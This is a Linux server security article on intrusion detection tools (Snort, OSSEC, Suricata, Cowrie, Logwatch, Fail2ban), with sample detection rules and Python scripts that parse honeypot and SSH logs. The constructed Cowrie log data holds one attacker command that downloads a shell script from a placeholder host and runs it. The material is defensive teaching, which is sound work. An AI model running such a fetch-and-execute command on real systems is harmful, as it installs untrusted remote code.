Linux Security

    Verifying Linux Server Security: What Every Admin Needs to Know - Intrusion Detection

    Date 02 Dec 2020
    Posted By Brittany Day


    Intrusion Detection

    Intrusion detection, meaning monitoring a network or host for malicious activity or policy violations, is a critical part of maintaining a secure Linux server. The information gathered through intrusion detection gives administrators valuable insight into the kinds of attacks actually being aimed at their servers, which is exactly the information needed to prioritize preventative defenses. In this section, we’ll begin by examining some excellent open-source intrusion detection system (IDS) tools and honeypots that help Linux server administrators identify and respond to threats before they lead to data theft or system compromise. We’ll then explore the importance of monitoring logs and look at how Logwatch and Fail2ban can be used for this purpose.

    Top Open-Source IDS Tools & Honeypots

    Snort

    Snort is the leader in free and open-source network intrusion detection systems (NIDS). It runs in three modes: packet sniffer mode (print packets to the console), packet logger mode (write packets to disk) and network intrusion detection mode (match traffic against a ruleset and alert). The ruleset can be written by the user or downloaded from the Snort community. With its rules and preprocessors, Snort detects port scans, OS fingerprinting attempts and known attacks, using signature matching for the latter and anomaly/protocol-based checks in its preprocessors. Snort is easy to install and supported by a large, vibrant community.

    Snort can be downloaded here.

    Learn how to install and use Snort for intrusion detection in this LinuxHint tutorial.

    OSSEC

    In the realm of host-based intrusion detection systems (HIDS), OSSEC dominates. This full-featured open-source tool combines log analysis, file integrity checking, rootkit detection and active response in a single agent, and is highly extensible. In its client/server architecture, agents forward logs and alerts to a central manager, where analysis and notification take place; because the evidence leaves the host as it is generated, it survives tampering even if the host is later compromised or taken offline. The same design lets you manage every agent from one server. OSSEC is very lightweight and is backed by a strong, supportive community.

    OSSEC can be downloaded here.

    Learn how to install and use OSSEC for intrusion detection in this LinuxHint tutorial.

    Suricata

    Suricata is a modern NIDS (and inline IPS) that employs signature-based, anomaly-based and policy-driven intrusion detection methods. It is multi-threaded from the ground up (and offered CUDA GPU acceleration in older releases) and includes statistical anomaly detection. Suricata parses application-layer protocols, so rules can inspect HTTP requests, TLS/SSL certificates and DNS transactions directly, and it can write protocol transaction logs (EVE JSON) in addition to alerts. Suricata's rule syntax is compatible with Snort's, so existing Snort rulesets can be loaded into Suricata.

    Suricata can be downloaded here.

    Learn how to configure and use Suricata for threat detection in this InfoSec Institute tutorial.
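    Two sample rules illustrate the rule syntax shared by Snort and Suricata that the Snort and Suricata sections above refer to. This is an added example, not taken from the article or from either project's shipped rulesets; the variables $HOME_NET, $EXTERNAL_NET and $HTTP_PORTS are the standard ones defined in snort.conf / suricata.yaml, and the sids are in the 1,000,000+ range reserved for local rules.

```snort
# Local rules (e.g. rules/local.rules). Both rules load in Snort 2.9.x and Suricata.

# Rule 1: repeated SSH connection attempts from one source. detection_filter holds
# the alert back until the fifth SYN from the same source IP within 60 seconds,
# so a single legitimate login never fires it.
alert tcp $EXTERNAL_NET any -> $HOME_NET 22 (msg:"LOCAL SSH connection flood from one source"; flags:S; flow:to_server; detection_filter:track by_src, count 5, seconds 60; classtype:attempted-recon; sid:1000001; rev:1;)

# Rule 2: directory traversal in an HTTP request URI. Matching on http_uri inspects
# the normalised URI, so percent-encoded variants such as %2e%2e%2f are caught too.
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"LOCAL path traversal in HTTP URI"; flow:to_server,established; content:"../"; http_uri; classtype:web-application-attack; sid:1000002; rev:1;)
```

    Bump rev: whenever you change a rule so that alert history stays interpretable, and test new rules against a pcap before enabling them on a production sensor.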

    Cowrie

    Cowrie is a medium-interaction SSH and Telnet honeypot that logs brute-force attempts and the shell session that follows a "successful" login. The open-source honeypot, written in Python, emulates a Unix system (it can also run in proxy mode, relaying sessions to a real backend) and records everything the attacker types and downloads. Cowrie writes its events as JSON, one object per line, for easy processing in log management solutions.
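    To show what "JSON logging for easy processing" buys you, here is an added example (not from the article or the Cowrie project) that reads Cowrie-style JSON events and pulls out the three things a defender wants first: which credentials were tried, whether the attacker got a shell, and what they ran. The event lines are constructed for this example; their field names (eventid, src_ip, session, username, password, input) follow Cowrie's JSON output format as the author of this example understands it, and the IP addresses are from documentation ranges.

```python
import json
import re
from collections import Counter, defaultdict

# Constructed Cowrie-style events for this example (not real honeypot data).
COWRIE_JSON_LOG = """\
{"eventid": "cowrie.session.connect", "src_ip": "203.0.113.7", "src_port": 51231, "session": "a1b2c3d4e5f6", "timestamp": "2020-12-02T10:00:01.000000Z"}
{"eventid": "cowrie.login.failed", "username": "root", "password": "123456", "src_ip": "203.0.113.7", "session": "a1b2c3d4e5f6", "timestamp": "2020-12-02T10:00:02.000000Z"}
{"eventid": "cowrie.login.failed", "username": "root", "password": "admin", "src_ip": "203.0.113.7", "session": "a1b2c3d4e5f6", "timestamp": "2020-12-02T10:00:03.000000Z"}
{"eventid": "cowrie.login.success", "username": "root", "password": "password", "src_ip": "203.0.113.7", "session": "a1b2c3d4e5f6", "timestamp": "2020-12-02T10:00:04.000000Z"}
{"eventid": "cowrie.command.input", "input": "uname -a", "src_ip": "203.0.113.7", "session": "a1b2c3d4e5f6", "timestamp": "2020-12-02T10:00:05.000000Z"}
{"eventid": "cowrie.command.input", "input": "wget http://198.51.100.99/x.sh -O /tmp/x.sh; sh /tmp/x.sh", "src_ip": "203.0.113.7", "session": "a1b2c3d4e5f6", "timestamp": "2020-12-02T10:00:07.000000Z"}
{"eventid": "cowrie.session.closed", "src_ip": "203.0.113.7", "session": "a1b2c3d4e5f6", "timestamp": "2020-12-02T10:00:09.000000Z"}
{"eventid": "cowrie.login.failed", "username": "admin", "password": "admin", "src_ip": "192.0.2.55", "session": "0f0e0d0c0b0a", "timestamp": "2020-12-02T10:01:00.000000Z"}
"""

URL_RE = re.compile(r"https?://\S+")


def parse_cowrie(log_text):
    """Group one-JSON-object-per-line Cowrie events by session id."""
    sessions = defaultdict(
        lambda: {"src_ip": None, "attempts": [], "commands": [], "compromised": False}
    )
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        s = sessions[ev["session"]]
        s["src_ip"] = ev.get("src_ip", s["src_ip"])
        eid = ev["eventid"]
        if eid in ("cowrie.login.failed", "cowrie.login.success"):
            ok = eid.endswith("success")
            s["attempts"].append((ev["username"], ev["password"], ok))
            if ok:
                s["compromised"] = True  # attacker now has an emulated shell
        elif eid == "cowrie.command.input":
            s["commands"].append(ev["input"])
    return dict(sessions)


def top_credentials(sessions, n=5):
    """Most frequently tried (username, password) pairs across all sessions."""
    counts = Counter()
    for s in sessions.values():
        for user, password, _ok in s["attempts"]:
            counts[(user, password)] += 1
    return counts.most_common(n)


def download_urls(sessions):
    """URLs fetched in attacker commands: the usual first sign of a dropper."""
    urls = []
    for s in sessions.values():
        for cmd in s["commands"]:
            urls.extend(URL_RE.findall(cmd))
    return urls


if __name__ == "__main__":
    sess = parse_cowrie(COWRIE_JSON_LOG)
    for sid, s in sess.items():
        print(sid, s["src_ip"], "compromised" if s["compromised"] else "failed",
              len(s["attempts"]), "attempts", len(s["commands"]), "commands")
    print("top credentials:", top_credentials(sess))
    print("downloads:", download_urls(sess))
```

    The download URLs and the credential list are the pieces worth feeding back into your defenses: the former as blocklist or proxy-alert entries, the latter as passwords to forbid on real accounts.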

    Monitoring Logs 

    Monitoring logs is an essential part of verifying the security of a server, and must be done on a regular basis to ensure that your systems remain secure. Critical log categories that should be monitored on every Linux server include application logs, authentication and event logs, service logs and system logs. On most distributions these live under /var/log (authentication events in /var/log/auth.log on Debian-based systems and /var/log/secure on Red Hat-based ones) or in the systemd journal, readable with journalctl. Many Linux distributions offer tools for automating this ongoing task.

    Logwatch

    The Logwatch application, for instance, sends a daily email summarising a server's logs, giving administrators valuable information such as potential malicious activity, SSH login attempts, IPs causing errors and the number of emails that have been sent. In a large corporate environment it is common practice to send Logwatch emails (along with other mail directed to the root user) to a single company email list. Administrators then subscribe to this list to stay informed of any notifications regarding suspicious activity detected in any of the company's server logs.

    Logwatch can be downloaded here.

    Learn how to install and use Logwatch in this TechRepublic tutorial.

    Fail2ban is another excellent application for monitoring logs and detecting intrusion attempts. This intrusion prevention framework scans log files for repeated failures (SSH password failures, web server authentication errors and so on) and, once an IP address exceeds a configured number of failures (maxretry) within a time window (findtime), reacts by installing a firewall rule that rejects that address for a set period (bantime), either on the affected port or entirely.
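    The logic behind both tools, scanning authentication logs and deciding which sources deserve a summary line or a ban, is small enough to show directly. The following is an added example, not code from the article, Logwatch or Fail2ban: it runs a Fail2ban-style sliding-window check (the maxretry, findtime and bantime parameters mirror Fail2ban's jail settings, with Fail2ban's defaults of 5, 600 and 600 seconds assumed) and a Logwatch-style per-IP summary over constructed sshd log lines. The regex follows the "Failed password" pattern that Fail2ban's sshd filter matches; the year is assumed because traditional syslog timestamps omit it.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample of sshd lines in traditional syslog format (not from the article).
# 203.0.113.7 hammers the server; 198.51.100.20 fails slowly, once every few minutes.
SAMPLE_AUTH_LOG = """\
Dec  2 10:00:01 web1 sshd[2101]: Failed password for invalid user admin from 203.0.113.7 port 51122 ssh2
Dec  2 10:00:04 web1 sshd[2103]: Failed password for invalid user admin from 203.0.113.7 port 51130 ssh2
Dec  2 10:00:09 web1 sshd[2107]: Failed password for root from 203.0.113.7 port 51140 ssh2
Dec  2 10:00:15 web1 sshd[2110]: Failed password for root from 203.0.113.7 port 51151 ssh2
Dec  2 10:00:20 web1 sshd[2114]: Failed password for invalid user oracle from 203.0.113.7 port 51160 ssh2
Dec  2 10:00:25 web1 sshd[2118]: Accepted publickey for deploy from 198.51.100.20 port 40022 ssh2: ED25519 SHA256:AAAA
Dec  2 10:05:31 web1 sshd[2130]: Failed password for alice from 198.51.100.20 port 40031 ssh2
Dec  2 10:30:00 web1 sshd[2140]: Failed password for alice from 198.51.100.20 port 40040 ssh2
Dec  2 10:40:00 web1 sshd[2150]: Failed password for alice from 198.51.100.20 port 40050 ssh2
Dec  2 10:55:00 web1 sshd[2160]: Failed password for alice from 198.51.100.20 port 40060 ssh2
Dec  2 11:02:00 web1 sshd[2170]: Failed password for alice from 198.51.100.20 port 40070 ssh2
"""

# Modelled on the failure pattern Fail2ban's sshd filter looks for.
FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+ ssh2$"
)


def parse_ts(ts, year=2020):
    """Syslog timestamps carry no year; 2020 is assumed for this sample."""
    return datetime.strptime(f"{year} {ts}", "%Y %b %d %H:%M:%S")


def find_bans(log_text, maxretry=5, findtime=600, bantime=600):
    """Fail2ban-style check: ban an IP after maxretry failures within findtime seconds."""
    window = timedelta(seconds=findtime)
    recent = defaultdict(deque)  # ip -> timestamps of failures still inside the window
    bans = {}                    # ip -> time the ban expires
    for line in log_text.splitlines():
        m = FAILED_RE.match(line)
        if not m:
            continue
        ip, t = m["ip"], parse_ts(m["ts"])
        if ip in bans and t < bans[ip]:
            continue  # still banned: the firewall would have dropped this attempt
        q = recent[ip]
        q.append(t)
        while q and t - q[0] > window:
            q.popleft()  # slide the window forward
        if len(q) >= maxretry:
            bans[ip] = t + timedelta(seconds=bantime)
            q.clear()
    return bans


def summarize(log_text):
    """Logwatch-style digest: failure count and usernames tried, per source IP."""
    per_ip = defaultdict(int)
    users = defaultdict(set)
    for line in log_text.splitlines():
        m = FAILED_RE.match(line)
        if m:
            per_ip[m["ip"]] += 1
            users[m["ip"]].add(m["user"])
    return {ip: {"failures": n, "users": sorted(users[ip])} for ip, n in per_ip.items()}


if __name__ == "__main__":
    for ip, info in summarize(SAMPLE_AUTH_LOG).items():
        print(f"{ip}: {info['failures']} failures, users tried: {', '.join(info['users'])}")
    for ip, until in find_bans(SAMPLE_AUTH_LOG).items():
        print(f"ban {ip} until {until:%H:%M:%S}")
    # Widening findtime to an hour catches the slow attacker as well.
    print("with findtime=3600:", sorted(find_bans(SAMPLE_AUTH_LOG, findtime=3600)))
```

    With Fail2ban's default window the fast attacker is banned after 19 seconds while the slow one, who never reaches five failures in ten minutes, is only visible in the daily summary; widening findtime to an hour bans both. That is the practical reason to read Logwatch digests as well as relying on automatic bans.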

    Fail2ban can be downloaded here.

    Learn how to install, configure and test Fail2ban in this How-To Geek tutorial.

    For information on log files locations and how you can view and monitor logs from the command line, check out this Ubuntu tutorial.
